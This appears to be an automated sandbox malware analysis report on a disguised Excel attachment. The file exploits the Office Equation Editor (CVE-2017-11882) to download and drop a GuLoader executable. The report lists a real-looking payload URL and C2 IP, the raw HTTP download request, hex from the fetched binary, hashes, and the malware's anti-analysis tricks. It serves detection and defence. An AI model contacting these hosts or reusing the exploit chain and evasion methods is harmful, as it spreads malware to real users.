Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Sample Name:	MTIR21487610_0062180102_20210714081247.PDF.xlsx
Analysis ID:	449166
MD5:	168c2cabea51b16aa19a152a652254f5
SHA1:	477715c6a9d3219ea85a60eac9c80af83a102357
SHA256:	9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 71MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://ceattire.com/bin_UYDMbHwI28.bin

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Jul 2021 09:06:43 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 300F3110.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E54E7 NtAllocateVirtualMemory,		6_2_003E54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E55AC NtAllocateVirtualMemory,		6_2_003E55AC

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E54E7	6_2_003E54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7036	6_2_003E7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E100E	6_2_003E100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4071	6_2_003E4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E80D4	6_2_003E80D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2940	6_2_003E2940
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E29B0	6_2_003E29B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2183	6_2_003E2183
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E42CD	6_2_003E42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E72C3	6_2_003E72C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B2D	6_2_003E1B2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B1A	6_2_003E1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7B73	6_2_003E7B73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B5F	6_2_003E1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4B8E	6_2_003E4B8E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8385	6_2_003E8385
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E43F1	6_2_003E43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E844C	6_2_003E844C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8C82	6_2_003E8C82
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8CD5	6_2_003E8CD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E34C4	6_2_003E34C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E350F	6_2_003E350F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8D58	6_2_003E8D58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52	6_2_003E7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0EFE	6_2_003E0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E3F0C	6_2_003E3F0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7F03	6_2_003E7F03
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7F6D	6_2_003E7F6D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0FB5	6_2_003E0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2793	6_2_003E2793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4785	6_2_003E4785

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE205.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Static file information: File size 1268792 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040495E push es; ret	6_2_00404963
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221774 push edx; ret	6_2_002217A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Stream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7036	6_2_003E7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E100E	6_2_003E100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4071	6_2_003E4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E42CD	6_2_003E42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B1A	6_2_003E1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B5F	6_2_003E1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E43F1	6_2_003E43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52	6_2_003E7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0EFE	6_2_003E0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0FB5	6_2_003E0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E6F9E	6_2_003E6F9E
